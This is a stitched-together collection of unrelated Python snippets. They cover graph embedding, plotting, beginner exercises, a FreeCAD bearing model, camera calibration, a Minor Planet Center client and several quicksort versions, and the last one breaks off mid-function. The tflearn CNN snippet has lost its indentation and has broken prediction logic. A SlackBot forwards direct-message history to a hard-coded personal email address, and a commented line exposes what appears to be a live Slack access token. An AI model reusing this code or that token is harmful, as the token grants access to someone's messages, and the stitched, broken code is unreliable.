    weights = [1, 0.1, 0.01, 0.001]
    U_list = RandNE.Projection(A, q, d, Ortho, seed)
    U = RandNE.Combine(U_list, weights)
    print('---evaluating---')
    #prec = Precision_Np(A, csr_matrix((N,N)), U, U, 1e6)
    #print(prec)
    auc = AUC(A, csr_matrix((N, N)), U, U, 1e6)
    print(auc)
    # embedding of the transition matrix, for classification
    q = 3
    weights = [1, 1e2, 1e4, 1e5]
    A_tran = normalize(A, norm='l1', axis=1)
    U_list = RandNE.Projection(A_tran, q, d, Ortho, seed)
    U = RandNE.Combine(U_list, weights)
    # L2-normalize the embedding rows.  Bug fix: the original normalized A,
    # discarding the embedding U it had just computed.
    U = normalize(U, norm='l2', axis=1)
    # Some Classification method, such as SVM in http://leitang.net/social_dimension.html
|
# sequencing
# conditionals
# loops
num = 1
# while num <= 10:
#     print(num)
#     num = num+1 # num += 1
# for, for-each
# lists
food = ['a','b','c','d']
foods = [food,"짬뽕","우동",'김밥']
print(foods)
for imis in foods: # ex) for-each
    print(imis)
for i in range(0,4,1): # i goes 0..3, step 1
    print(foods[i])
# After the loop i == 3; foods[0] is the inner list, so both prints show 'd'.
a = foods[0]
print(a[i])
print(foods[0][i])
import numpy as np
import matplotlib.pyplot as plt
# Two data series to plot against a shared 21-point x axis.
y1 = [10.1,7.95,7.0,6.5,6.3,6.1,6.0,5.8,5.75,5.5,
      5.45,5.4,5.3,5.2,5.18,5.1,5.12,5.1,6.08,7.01,8.8]
y2 = [9.5,4.5,6.1,5.2,4.1,4,5,5.5,5.5,6,6,5.5,4.5,4,
      4,4.5,5.5,4.5,5,5,5]
# Bug fix: under Python 3, map() returns a one-shot iterator; materialize it
# so plt.xticks receives a real sequence of labels.
xticklabels = list(map(str, np.arange(21) + 5))
yticks = range(4, 11)
xlabel = 'Foo'
ylabel = 'Bar'
curveLabels = ['Curve A', 'Curve B']
plt.figure(figsize=(9, 4))
plt.plot(y1, '-D', label=curveLabels[0], color='#555555',
         lw=2, markeredgecolor='None', markersize=6,
         zorder=10, clip_on=False)
plt.plot(y2, '-s', label=curveLabels[1], color='#AAAAAA',
         lw=2, markeredgecolor='None', markersize=8,
         zorder=11, clip_on=False)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.yticks(yticks)
plt.xticks(np.arange(len(y1)), xticklabels, rotation='45')
legend = plt.legend(fontsize=16, bbox_to_anchor=(0.95, 0.955),
                    numpoints=1, borderpad=0.9, handlelength=3)
frame = legend.get_frame()
frame.set_facecolor('white')
frame.set_edgecolor('white')
# Horizontal grid only, with a clean open-box axis style.
plt.gca().xaxis.grid(False)
plt.gca().yaxis.grid(True, color='black', linestyle='-')
plt.xlim(-0.5, len(y1) - 0.5)
plt.ylim(4, 10.5)
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().get_xaxis().tick_bottom()
plt.gca().get_yaxis().tick_left()
# NOTE(review): tick1On/tick2On are deprecated matplotlib attributes — confirm
# against the installed matplotlib version.
for tic in plt.gca().xaxis.get_major_ticks():
    tic.tick1On = tic.tick2On = False
plt.gca().tick_params(axis='y', direction='out')
plt.gca().spines['left'].set_linewidth(2)
plt.gca().spines['left'].set_color('#888888')
plt.gca().spines['bottom'].set_linewidth(2)
plt.gca().spines['bottom'].set_color('#888888')
plt.gca().yaxis.set_tick_params(width=2, length=5,
                                color='#888888')
|
import numpy
import sys
def get_base(num):
    """Return the largest odd integer not exceeding floor(sqrt(num))."""
    root = int(numpy.sqrt(num))
    if root % 2 == 0:
        root -= 1
    return root
def run(num):
    """Print the spiral-grid distance for *num*.

    NOTE(review): under Python 3, base/2 yields a float so the printed value
    is a float; this looks like Python 2 heritage (integer division intended)
    — confirm the target interpreter before relying on the output format.
    """
    base = get_base(num)
    min_dist = base/2 + 1
    start = base**2 + min_dist
    print ((num - start) % min_dist + min_dist)
if __name__ == '__main__':
    # The number to locate is taken from the command line.
    number = sys.argv[1]
    run(int(number))
|
#@+leo-ver=5-thin
#@+node:ekr.20230710105542.1: * @file ../unittests/commands/test_commanderFileCommands.py
"""Tests of leo.commands.leoConvertCommands."""
import os
import tempfile
import textwrap
from typing import Any
from leo.core import leoGlobals as g
from leo.core.leoTest2 import LeoUnitTest
assert g
assert textwrap
#@+others
#@+node:ekr.20230710105810.1: ** class TestRefreshFromDisk (LeoUnitTest)
class TestRefreshFromDisk (LeoUnitTest):
    #@+others
    #@+node:ekr.20230710105853.1: *3* TestRefreshFromDisk.test_refresh_from_disk
    def test_refresh_from_disk(self):
        # Round trip: write @clean/@file bodies to a temp file, then verify
        # refreshFromDisk reproduces the body for two successive revisions.
        c = self.c
        at = c.atFileCommands
        p = c.p
        def dummy_precheck(fileName: str, root: Any) -> bool:
            """A version of at.precheck that always returns True."""
            return True
        at.precheck = dummy_precheck # Force all writes.
        # Define data.
        raw_contents = '"""Test File"""\n'
        altered_raw_contents = '"""Test File (changed)"""\n'
        # Create a writable directory.
        directory = tempfile.gettempdir()
        # Run the tests.
        for kind in ('clean', 'file'):
            file_name = f"{directory}{os.sep}test_at_{kind}.py"
            p.h = f"@{kind} {file_name}"
            for pass_number, contents in (
                (0, raw_contents),
                (1, altered_raw_contents),
            ):
                p.b = contents
                msg = f"{pass_number}, {kind}"
                # Create the file (with sentinels for @file).
                if kind == 'file':
                    at.writeOneAtFileNode(p)
                    file_contents = ''.join(at.outputList)
                else:
                    file_contents = contents
                with open(file_name, 'w') as f:
                    f.write(file_contents)
                with open(file_name, 'r') as f:
                    contents2 = f.read()
                self.assertEqual(contents2, file_contents, msg=msg)
                c.refreshFromDisk(event=None)
                self.assertEqual(p.b, contents, msg=msg)
            # Remove the file.
            self.assertTrue(os.path.exists(file_name), msg=file_name)
            os.remove(file_name)
            self.assertFalse(os.path.exists(file_name), msg=file_name)
    #@-others
#@-others
#@-leo
|
__author__ = 'naveenkumar'
import requests
import copy
import datetime
import json
from django.core.mail import EmailMultiAlternatives
class SlackBot(object):
    """Pulls recent Slack direct-message history and mails a digest of it."""
    def __init__(self, settings):
        # settings must contain a Slack API 'TOKEN'.
        self._TOKEN = settings['TOKEN']
        self._BASE_ENDPOINT = "https://slack.com"
        self._PARAMS = {'token': self._TOKEN}
    def get_imc_list(self):
        """Return the list of IM channels visible to the token."""
        url = self._BASE_ENDPOINT + "/api/im.list"
        res = requests.get(url, params=self._PARAMS)
        return json.loads(res.text).get('ims')
    def get_user_info(self, id):
        """Return the Slack user record for *id*."""
        url = self._BASE_ENDPOINT + "/api/users.info"
        params = copy.deepcopy(self._PARAMS)
        params.update({'user': id})
        res = requests.get(url, params=params)
        return json.loads(res.text).get('user')
    def get_messages_from_imc(self,imc_id):
        """Return up to 1000 messages from one IM channel, last two days only."""
        url = self._BASE_ENDPOINT + "/api/im.history"
        params = copy.deepcopy(self._PARAMS)
        date = datetime.datetime.now() - datetime.timedelta(days=2)
        timestamp = totimestamp(date)
        params.update({
            'channel': imc_id,
            'oldest': timestamp,
            'count': 1000
        })
        res = requests.get(url, params=params)
        return json.loads(res.text)
    def get_messages_from_imcs(self):
        """Collect recent messages from every IM channel and email a digest.

        NOTE(review): recipient and sender addresses are hard-coded below.
        """
        im_messages = []
        imc_list = self.get_imc_list()
        for imc in imc_list:
            user_info = self.get_user_info(imc.get('user'))
            im_id = imc.get('id')
            messages = self.get_messages_from_imc(im_id)
            messages_to_send = []
            # Reverse so the digest reads oldest-first.
            for message in reversed(messages.get('messages')):
                messages_to_send.append(message.get('text'))
            im_messages.append({
                'user': {
                    'name': user_info.get('name') if user_info.get('name') is not None else user_info.get('profile').get('real_name')
                },
                'messages': messages_to_send
            })
        body = ""
        for item in im_messages:
            body = body + '{name} - {res}\n'.format(name=item['user']['name'], res=item['messages'])
        #print(im_messages)
        subject = "SLACK CHAT: " + datetime.datetime.now().strftime("%d %m %Y")
        send_to = ["naveen.nitk2009@gmail.com"]
        msg = EmailMultiAlternatives(subject, json.dumps(body),
                                     "myslackbot@slackbot.com", send_to)
        msg.send()
        return
def totimestamp(dt, epoch=datetime.datetime(1970,1,1)):
    """Convert a naive datetime to seconds since the Unix epoch (float)."""
    delta = dt - epoch
    # return delta.total_seconds()
    micros = delta.microseconds + (delta.seconds + delta.days * 86400) * 10**6
    return micros / 10**6
# if __name__ == "__main__":
# sbot = SlackBot(settings={'TOKEN': "xoxp-2526871921-13207990918-16823177588-bb0c66d389"})
# sbot.get_messages_from_imcs() |
def primo(num):
    """Return True if *num* is prime, False otherwise.

    Bug fix: the original returned True for num < 2 (0, 1 and negatives are
    not prime by definition).
    """
    if num < 2:
        return False
    for i in range(2, num):
        if num % i == 0:  # a divisor was found:
            return False  # not prime
    return True  # no divisor other than 1 and num
# Read one integer and report (in Spanish) whether it is prime.
numero = int(input("Introduzca un número: "))
if primo(numero):
    print("Es primo (solo tiene dos divisores)")
else:
    print("No es primo (tiene más de dos divisores)")
|
import numpy as np
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.estimator import regression
from tflearn.data_preprocessing import ImagePreprocessing
from tflearn.data_augmentation import ImageAugmentation
import h5py
class CNN:
def __init__(self):
self.trained_model = None
def build_training_dataset(self,path):
"""Build hdf5 file from collection of images and labels
Parameters
----------
path: string
Path to text file with content "path/to/image label"
"""
from tflearn.data_utils import build_hdf5_image_dataset as hdf5
hdf5(path,image_shape=(32,32),mode='file',output_path='training_data/training_dataset.h5',categorical_labels=True, grayscale=False)
def network(self):
"""Build the training neural network
Returns
-------
network: tensor
the network tensor
"""
network = input_data(shape=[None,32,32,3])
# 32 convolution filters with size 3 and stride 1
network = conv_2d(network,32,3,activation='relu')
# max pooling layer with kernel size of 2
network = max_pool_2d(network,2)
# 64 convolution filter with size 3 and stride 1
network = conv_2d(network,64,3,activation='relu')
# max pooling layer with kernel size of 2
network = max_pool_2d(network,2)
# fully connected neural network with 512 nodes
network = fully_connected(network,512,activation='relu')
# fully connected neural network with 6 nodes
network = fully_connected(network,7,activation='softmax')
# classifier
network = regression(network,optimizer='adam',loss='categorical_crossentropy',learning_rate=0.01)
return network
def train(self,path,num_iters=1000,save=False):
"""Train the network with input data
Parameters
----------
path: string
Path of the .h5 dataset
"""
f=h5py.File(path,'r')
X = f['X'][()]
Y = f['Y'][()]
network = self.network()
# wrapping the network in deep learning model
model = tflearn.DNN(network,tensorboard_verbose=1)
# start training
model.fit(X,Y,n_epoch=num_iters,shuffle=True,show_metric=True,batch_size=100,snapshot_epoch=True,run_id='autocar')
# save the model in the instance
self.trained_model = model
if save==True:
# save the model in a file
model.save('training_data/trained_model.tf')
def load_model(self,model_path):
"""
Parameters
----------
model_path: string
Path to the saved model file
"""
model = tflearn.DNN(self.network())
model.load(model_path)
self.trained_model = model
def predict(self,X):
"""Make predictions after trained model is loaded
Parameters
----------
X: ndarray()
Image of size 64x64
"""
vector = self.trained_model.predict(X)
prob = max(vector)
index = [i for i, j in enumerate(vector) if j == vector]
direction = ""
if index == 0:
direction = "Forward Right"
elif index == 1:
direction = "Forward Left"
elif index == 2:
direction = "Forward"
elif index == 3:
direction = "Right"
elif index == 4:
direction = "Left"
elif index == 5:
direction = "Backwards"
print direction
return vector
|
def add(a, b):
    """Return the sum of a and b."""
    return a + b
def sub(a, b):
    """Return the difference a - b."""
    return a - b
def mul(a, b):
    """Return the product of a and b."""
    return a * b
def division(a, b):
    """Return the true-division quotient a / b (raises ZeroDivisionError for b == 0)."""
    return a / b
# Read two integers and show the result of the four basic operations.
a=int(input("enter a value:"))
b=int(input("enter b value:"))
print(add(a,b))
print(sub(a,b))
print(mul(a,b))
# NOTE(review): raises ZeroDivisionError when b == 0.
print(division(a,b))
|
import pandas as pd
def create_dataframe(csv_file):
    """Reshape a wide StreetEasy table into a long, date-indexed frame.

    The date columns are melted into (variable, value) pairs; 'variable' is
    parsed as a datetime and installed as the index.
    """
    melted = pd.melt(csv_file, id_vars=['areaName', 'Borough', 'areaType'])
    melted['variable'] = pd.to_datetime(melted['variable'], infer_datetime_format=True)
    melted.set_index('variable', inplace=True)
    return melted
def select_borough_data(dataframe, borough):
    """Return only the borough-level rows for the given borough name.

    Acceptable inputs: Manhattan, Bronx, Brooklyn, Queens, Staten Island.
    """
    subset = dataframe[dataframe['Borough'] == borough]
    return subset[subset['areaType'] == 'borough']
def describe_data(dataframe):
    """Summarize min/max asking price ('value' column, datetime index) and the
    percentage growth between their years, as one English sentence string."""
    low = dataframe['value'].min()
    high = dataframe['value'].max()
    low_year = str(dataframe[dataframe['value'] == low].index[0]).split(" ")[0][:4]
    high_year = str(dataframe[dataframe['value'] == high].index[0]).split(" ")[0][:4]
    span = int(high_year) - int(low_year)
    growth = (high - low) / low
    sentences = [
        'The lowest median asking price was ${:0,.0f} which was in the year {}.'.format(low, low_year),
        'The highest median asking price was ${:0,.0f} which was in the year {}.'.format(high, high_year),
        'Over the course of {} years (between {} and {}), the asking price has increased by {:.1%}.'.format(span, low_year, high_year, growth),
    ]
    return ' '.join(sentences)
def calculate_asking_price_change(dataframe, starting_year_and_month, ending_year_and_month):
    """Describe the change in median asking price between two year-months.

    Year-months are 'YYYY-MM' strings compared lexically; the start must come
    before the end or an explanatory message is returned instead.
    """
    if starting_year_and_month > ending_year_and_month:
        return 'Starting Year needs to be before the ending year. Try switching the numbers.'
    begin = int(dataframe.loc[starting_year_and_month]['value'])
    end = int(dataframe.loc[ending_year_and_month]['value'])
    change = (end - begin) / begin
    first = 'The median asking price from {} to {} went from {:0,.0f} to {:0,.0f}.'.format(
        starting_year_and_month, ending_year_and_month, begin, end)
    second = 'This represented a percentage change of {:.1%}.'.format(change)
    return first + ' ' + second
|
import FreeCAD as App
import FreeCADGui as Gui
import Part
import math as Math
from pivy.coin import *
from PySide import QtGui, QtCore # https://www.freecadweb.org/wiki/PySide
def MyNewApp():
    # Create a new document "merzi" if none is active yet.
    if not(App.ActiveDocument):
        #Create new document
        App.newDocument("merzi")
        App.setActiveDocument("merzi")
        App.ActiveDocument=App.getDocument("merzi")
        Gui.ActiveDocument=Gui.getDocument("merzi")
class MerziLinie:
    """FreeCAD GUI command: draw a line between two clicked points."""
    def Activated(self):
        # Create a new document if none exists yet.
        MyNewApp()
        self.view = Gui.ActiveDocument.ActiveView
        self.stack = []
        # Listen for mouse clicks until two points are collected.
        self.callback = self.view.addEventCallbackPivy(SoMouseButtonEvent.getClassTypeId(),self.getpoint)
    def GetResources(self):
        return {'MenuText': 'Line', 'ToolTip': 'Creates a line by clicking 2 points on the screen'}
    def getpoint(self,event_cb):
        event = event_cb.getEvent()
        if event.getState() == SoMouseButtonEvent.DOWN:
            pos = event.getPosition()
            point = self.view.getPoint(pos[0],pos[1])
            self.stack.append(point)
            if len(self.stack) == 2:
                # Two points collected: build the segment and stop listening.
                l = Part.LineSegment(self.stack[0],self.stack[1])
                shape = l.toShape()
                Part.show(shape)
                self.view.removeEventCallbackPivy(SoMouseButtonEvent.getClassTypeId(),self.callback)
class makeKugellager:
    """FreeCAD GUI command: construct a parametric ball bearing."""
    def Activated(self):
        # Create a new document if none exists yet.
        MyNewApp()
        # Draw the bearing.
        self.callback = self.KugellagerZeichnen()
    def GetResources(self):
        return {'MenuText': 'Kugellager', 'ToolTip': '...'}
    def KugellagerZeichnen(self):
        """Build inner ring, outer ring and balls from the parameters below."""
        #VALUES#
        #(radius of shaft/inner radius of inner ring)
        R1=15.0
        #(outer radius of inner ring)
        R2=25.0
        #(inner radius of outer ring)
        R3=30.0
        #(outer radius of outer ring)
        R4=40.0
        #(thickness of bearing)
        TH=15.0
        #(number of balls)
        NBall=15
        #(radius of ball)
        RBall=5.0
        #(rounding radius for fillets)
        RR=1
        #first coordinate of center of ball
        CBall=((R3-R2)/2)+R2
        #second coordinate of center of ball
        PBall=TH/2
        #Inner Ring#
        B1=Part.makeCylinder(R1,TH)
        B2=Part.makeCylinder(R2,TH)
        IR=B2.cut(B1)
        #get edges and apply fillets
        Bedges=IR.Edges
        IRF=IR.makeFillet(RR,Bedges)
        #create groove and show shape
        T1=Part.makeTorus(CBall,RBall)
        T1.translate(App.Vector(0,0,TH/2))
        InnerRing=IRF.cut(T1)
        Part.show(InnerRing)
        #
        #Outer Ring#
        B3=Part.makeCylinder(R3,TH)
        B4=Part.makeCylinder(R4,TH)
        OR=B4.cut(B3)
        #get edges and apply fillets
        Bedges=OR.Edges
        ORF=OR.makeFillet(RR,Bedges)
        #create groove and show shape
        T2=Part.makeTorus(CBall,RBall)
        T2.translate(App.Vector(0,0,TH/2))
        OuterRing=ORF.cut(T2)
        Part.show(OuterRing)
        #
        #Balls# placed evenly around the raceway circle of radius CBall
        for i in range(NBall):
            Ball=Part.makeSphere(RBall)
            Alpha=(i*2*Math.pi)/NBall
            BV=(CBall*Math.cos(Alpha),CBall*Math.sin(Alpha),TH/2)
            Ball.translate(BV)
            Part.show(Ball)
        #
        #Make it pretty#
        Gui.SendMsgToActiveView("ViewFit")
class makeBalken:
    """FreeCAD GUI command stub: draw a beam (not implemented yet)."""
    def Activated(self):
        # Create a new document if none exists yet.
        MyNewApp()
        # NOTE(review): this dialog is created but never shown or read.
        dialog = QtGui.QFileDialog(
            QtGui.qApp.activeWindow(),
            "Select FreeCAD document to import part from"
        )
        # Draw the beam.
        self.callback = self.BalkenZeichnen()
    def GetResources(self):
        return {'MenuText': 'Balken', 'ToolTip': 'Balken zeichenen'}
    def BalkenZeichnen(self):
        # Placeholder implementation.
        print("asdf")
        return()
# Register the commands with the FreeCAD GUI.
Gui.addCommand('MerziLinie', MerziLinie())
Gui.addCommand('makeKugellager', makeKugellager())
Gui.addCommand('makeBalken', makeBalken())
|
import numpy as np
import scipy as sp
import scipy.linalg
# Load corresponding world/image points and append a row of ones
# (homogeneous coordinates); each file holds 10 point columns.
world = np.loadtxt('world.txt')
image = np.loadtxt('image.txt')
world = np.concatenate([world, np.ones((1, 10))])
image = np.concatenate([image, np.ones((1, 10))])
# Build the 2n x 12 DLT system A.p = 0 from the correspondences.
A = np.zeros((0, 12))
for i in range(10):
    x = image[:, i]
    X = world[:, i]
    a1 = np.concatenate([np.zeros(4), -x[2] * X, x[1] * X]).reshape(1, -1)
    a2 = np.concatenate([x[2] * X, np.zeros(4), -x[0] * X]).reshape(1, -1)
    A = np.concatenate([A, a1, a2])
# P is the right singular vector for the smallest singular value.
u, d, v = np.linalg.svd(A)
p = v[d.argmin()].reshape((3, 4))
print('P is: ', p)
# verify re-projection: project world points and normalize by the third row
image_p = p.dot(world)
image_p = image_p / image_p[2]
print('re-projection', image_p)
# Camera centre C is the (homogeneous) null vector of P.
u, d, v = np.linalg.svd(p)
c = v[3]
print('C is:', c)
# RQ-decompose P into intrinsics k and [R|t]; solve R.C = -t for C.
# (Fix: removed a dead `r_ = r[:, -1]` that was immediately overwritten.)
k, r = sp.linalg.rq(p, mode='economic')
r_ = r[:, :-1]
t = r[:, -1]
c2 = np.linalg.solve(r_, -t)
print('verified C is:', c2)  # [ 1. -1. -1.]
|
""" Module to interface with the MPC website
"""
import json
import logging
import pprint
import re
import urllib.error
import urllib.parse
import urllib.request
from os import path, makedirs
import target
logger = logging.getLogger(__name__)
# Per-user application data directory (Windows %LOCALAPPDATA%); created on import.
appdatadir = path.expandvars(r'%LOCALAPPDATA%\AutoSkyX')
if not path.exists(appdatadir):
    makedirs(appdatadir)
class MPCweb(object):
    """ Class to interface with the MPC website.

    Provides downloads of the PCCP, NEOCP and critical lists, plus helpers
    to generate FindOrb/small-body database text and cache orbit data.
    """

    def __init__(self, pcp="http://www.minorplanetcenter.net/iau/NEO/pccp.txt",
                 neocp="http://www.minorplanetcenter.net/iau/NEO/neocp.txt",
                 crits="http://www.minorplanetcenter.net/iau/Ephemerides/CritList/Soft06CritList.txt"):
        """Store the source URLs for the three MPC data products."""
        self.pcp = pcp      # Potential Comet Confirmation Page
        self.neocp = neocp  # NEO Confirmation Page
        self.crits = crits  # critical-list minor planets

    def get_pcp(self):
        """ Get the Potential Comet data (currently just logged line by line).
        """
        data = urllib.request.urlopen(self.pcp)
        for line in data:
            logger.debug(line)

    def get_neocp(self):
        """ Get the NEOCP data.

        Returns:
            list of target.target objects, one per fixed-width NEOCP row.
        """
        data = urllib.request.urlopen(self.neocp).readlines()
        # Fixed-width columns of the NEOCP text product.
        regex = re.compile("^(.{7}) (.{3}) (.{12}) (.{8}) (.{8}) (.{4})" +
                           " (.{22}) (.{7}) (.{3}) (.{6}) (.{4})")
        my_neos = []
        for line in data:
            res = regex.match(line.decode('UTF-8'))
            my_neo = target.target(res.group(1).strip())
            my_neo.addneoprops(res.group(2), res.group(3),
                               res.group(4), res.group(5), res.group(6),
                               res.group(7), res.group(8), res.group(9),
                               res.group(10), res.group(11))
            my_neos.append(my_neo)
        return my_neos

    def get_crits(self):
        """ Get the Critical List data.

        Returns:
            list of target.target objects with ttype "mp".
        """
        data = urllib.request.urlopen(self.crits).readlines()
        # Pipe-separated fixed-width columns (raw string avoids invalid \| escapes).
        regex = re.compile(
            r"^(.{21})\|(.{14})\|(.{10})\|(.{8})\|(.{8})\|(.{9})\|(.{9})\|(.{5})\|(.{10})\|(.{5})\|(.{5})")
        crits = []
        for line in data:
            res = regex.match(line.decode('UTF-8'))
            logger.debug(line)
            logger.debug(res.group(2))
            crit = target.target(res.group(1).strip(), ttype="mp")
            logger.debug(res.group(2) + " " + res.group(3) + " " +
                         res.group(4) + " " + res.group(5) + " " +
                         res.group(6) + " " + res.group(7) + " " +
                         res.group(9) + " " + res.group(10) + " " +
                         res.group(11))
            crit.addcritprops(res.group(2), res.group(3), res.group(4),
                              res.group(5), res.group(6), res.group(7),
                              res.group(9), res.group(10), res.group(11))
            crits.append(crit)
        return crits

    def gen_findorb(self, neocplist):
        """ Generate the FindOrb format database.
        """
        findorbdb = ""
        for item in neocplist:
            url = "http://scully.cfa.harvard.edu/cgi-bin/showobsorbs.cgi?Obj=" \
                + item.tmpdesig + "&obs=y"
            data = urllib.request.urlopen(url)
            for line in data:
                # Fix: urlopen yields bytes; decode before the substring test
                # (the original compared str against bytes, a TypeError on
                # Python 3) and before concatenating into the str result.
                line = line.decode('UTF-8')
                if "html" not in line:
                    findorbdb = findorbdb + line
        return findorbdb

    def unpack_epoch(self, packed):
        """ Unpack the MPC packed epoch format (e.g. "K193B") into
        "YYYY MM DD.000".
        """
        # Packed digits: 1-9 then A..V cover values 01..31 (months/days)
        # and century codes (I=18xx, J=19xx, K=20xx).
        ehash = {'1': '01',
                 '2': '02',
                 '3': '03',
                 '4': '04',
                 '5': '05',
                 '6': '06',
                 '7': '07',
                 '8': '08',
                 '9': '09',
                 'A': '10',
                 'B': '11',
                 'C': '12',
                 'D': '13',
                 'E': '14',
                 'F': '15',
                 'G': '16',
                 'H': '17',
                 'I': '18',
                 'J': '19',
                 'K': '20',
                 'L': '21',
                 'M': '22',
                 'N': '23',
                 'O': '24',
                 'P': '25',
                 'Q': '26',
                 'R': '27',
                 'S': '28',
                 'T': '29',
                 'U': '30',
                 'V': '31'}
        # century | 2-digit year | month code | day code
        regex = re.compile("(.)(..)(.)(.)")
        matches = regex.match(packed)
        year = ehash[matches.group(1)] + matches.group(2)
        month = ehash[matches.group(3)]
        day = ehash[matches.group(4)]
        datestr = year + " " + month + " " + day + ".000"
        return datestr

    def gen_smalldb(self, neocplist, download=False):
        """ Download orbit data, store it in objects, and return a smalldb.
        """
        smalldb = ""
        for item in neocplist:
            if item.ttype == "neo":
                # g should be populated if we got the orbit data before
                if download == True:
                    url = "https://cgi.minorplanetcenter.net/cgi-bin/showobsorbs.cgi?Obj=" \
                        + item.tmpdesig + "&orb=y"
                    logger.debug(url)
                    data = urllib.request.urlopen(url).readlines()
                    for line in data:
                        line = line.decode("UTF-8")
                        if "NEOCPNomin" in line:
                            values = line.split()
                            item.addorbitdata(values[1], values[2],
                                              self.unpack_epoch(values[3]),
                                              values[4], values[5], values[6],
                                              values[7], values[8], values[9],
                                              values[10])
                            dbline = " %-19.19s|%-14.14s|%8.6f |%8f|%8.4f|%8.4f |%8.4f| 2000|%9.4f |%5.2f|%-5.2f| 0.00\n" % (
                                values[0], self.unpack_epoch(values[3]),
                                float(values[8]), float(values[10]),
                                float(values[7]), float(values[6]),
                                float(values[5]), float(values[4]),
                                float(values[1]), float(values[2]))
                            logger.debug(dbline)
                            smalldb = smalldb + dbline
                            break
                else:
                    # We already have it. Return the db line.
                    dbline = " %-19.19s|%-14.14s|%8.6s |%8s|%8.4s|%8.4s |%8.4s| 2000|%9.4s |%5.2s|%-5.2s| 0.00\n" % (
                        item.tmpdesig, item.epoch, item.e, item.a, item.incl,
                        item.node, item.peri, item.m, item.h, item.g)
                    logger.debug(dbline)
                    smalldb = smalldb + dbline
            elif item.ttype == "mp":  # regular minor planet
                dbline = " %-19.19s|%-14.14s|%8.6f |%8f|%8.4f|%8.4f |%8.4f| 2000|%9.4f |%5.2f|%-5.2f| 0.00\n" % (
                    item.tmpdesig, item.epoch, float(item.e), float(item.a),
                    float(item.incl), float(item.node), float(item.peri),
                    float(item.m), float(item.h), float(item.g))
                logger.debug(item.peri)
                logger.debug(type(item.peri))
                logger.debug(dbline)
                smalldb = smalldb + dbline
            else:
                # TODO possibly go to skyx if we can
                pass
        # Write everything we know to the neocplist cache file.
        try:
            with open(path.join(appdatadir, "neocplist")) as json_file:
                cache = json.load(json_file)
        except (IOError, ValueError):
            # First run (no cache file yet) or corrupt cache: start fresh.
            cache = []
        outlist = []
        for item in neocplist:
            outlist.append(item.__dict__)
        for cached in cache:
            # Fix: the original tested a filter object, which is ALWAYS truthy,
            # so cached entries were never carried forward; it also accessed
            # the cached dict via attribute instead of key.
            if not any(entry['tmpdesig'] == cached['tmpdesig'] for entry in outlist):
                outlist.append(cached)
        with open(path.join(appdatadir, "neocplist"), 'w') as outfile:
            json.dump(outlist, outfile)
        return smalldb

    def updatefromcache(self, neocplist):
        """Fill in orbit data for targets whose designation is in the cache."""
        with open(path.join(appdatadir, "neocplist")) as json_file:
            cache = json.load(json_file)
        for item in neocplist:
            print(item)
            print(item.tmpdesig)
            for c in cache:
                print(c)
                if item.tmpdesig == c['tmpdesig']:
                    item.addorbitdata(c['h'], c['g'], c['epoch'], c['m'],
                                      c['peri'], c['node'], c['incl'],
                                      c['e'], c['n'], c['a'])
if __name__ == "__main__":
    # Smoke test: fetch the current NEOCP list and dump each target's fields.
    MPC = MPCweb()
    NEOS = MPC.get_neocp()
    for neo in NEOS:
        pprint.pprint(vars(neo))
|
'''
Created on Jan 25, 2017
@author: wans
'''
from nltk.corpus import stopwords
# import nltk
# nltk.download('all', halt_on_error=False)
# nltk.download()
# Report how many English stop words NLTK ships with.
english_stopwords = stopwords.words('english')
print(len(english_stopwords))
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""FAIR1M datamodule."""
from typing import Any
import torch
from torch import Tensor
from ..datasets import FAIR1M
from .geo import NonGeoDataModule
def collate_fn(batch: list[dict[str, Tensor]]) -> dict[str, Any]:
    """Custom object detection collate fn to handle variable boxes.

    Images are stacked into a single tensor; boxes and labels (whose first
    dimension varies per sample) are kept as per-sample lists.

    Args:
        batch: list of sample dicts return by dataset

    Returns:
        batch dict output

    .. versionadded:: 0.5
    """
    first = batch[0]
    collated: dict[str, Any] = {
        "image": torch.stack([sample["image"] for sample in batch])
    }
    if "boxes" in first:
        collated["boxes"] = [sample["boxes"] for sample in batch]
    if "label" in first:
        collated["label"] = [sample["label"] for sample in batch]
    return collated
class FAIR1MDataModule(NonGeoDataModule):
    """LightningDataModule implementation for the FAIR1M dataset.

    .. versionadded:: 0.2
    """

    def __init__(
        self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any
    ) -> None:
        """Initialize a new FAIR1MDataModule instance.

        Args:
            batch_size: Size of each mini-batch.
            num_workers: Number of workers for parallel data loading.
            **kwargs: Additional keyword arguments passed to
                :class:`~torchgeo.datasets.FAIR1M`.

        .. versionchanged:: 0.5
           Removed *val_split_pct* and *test_split_pct* parameters.
        """
        super().__init__(FAIR1M, batch_size, num_workers, **kwargs)
        self.collate_fn = collate_fn

    def setup(self, stage: str) -> None:
        """Set up datasets.

        Args:
            stage: Either 'fit', 'validate', 'test', or 'predict'.
        """
        if stage == "fit":
            self.train_dataset = FAIR1M(split="train", **self.kwargs)
        if stage in ("fit", "validate"):
            self.val_dataset = FAIR1M(split="val", **self.kwargs)
        if stage == "predict":
            # Test set labels are not publicly available
            self.predict_dataset = FAIR1M(split="test", **self.kwargs)
|
def quicksort(nums):
    """Return a sorted copy of nums (functional 3-way quicksort on nums[0])."""
    if len(nums) <= 1:
        return nums
    pivot = nums[0]
    smaller = [x for x in nums if x < pivot]
    equal = [x for x in nums if x == pivot]
    larger = [x for x in nums if x > pivot]
    return quicksort(smaller) + equal + quicksort(larger)
# Demo: sort a small list with the functional quicksort above.
nums = [3,1,4,5,2,4]
print(quicksort(nums))
def partition(nums,l,r):
    """Partition nums[l..r] around pivot nums[l]; return the pivot's final index.

    Elements <= pivot end up to its left, elements >= pivot to its right.
    """
    pivot = nums[l]
    while l < r:  # pivot was taken from the left end, so scan from the right first
        while l < r and nums[r] >= pivot:
            r -= 1
        nums[l]=nums[r]
        while l < r and nums[l] <= pivot:
            l+=1
        nums[r]=nums[l]
    # l == r here: this slot is the pivot's sorted position.
    nums[l] = pivot
    return l
def quicksort(nums, l, r):
    """In-place quicksort of nums[l..r] via partition(); returns nums."""
    if l >= r:
        return nums
    split = partition(nums, l, r)
    quicksort(nums, l, split - 1)
    quicksort(nums, split + 1, r)
    return nums
print(quicksort([2,1,23,2,4,5], 0, 5))
import random
def quicksort(nums, l, r):
    """In-place quicksort of nums[l..r]; returns nums.

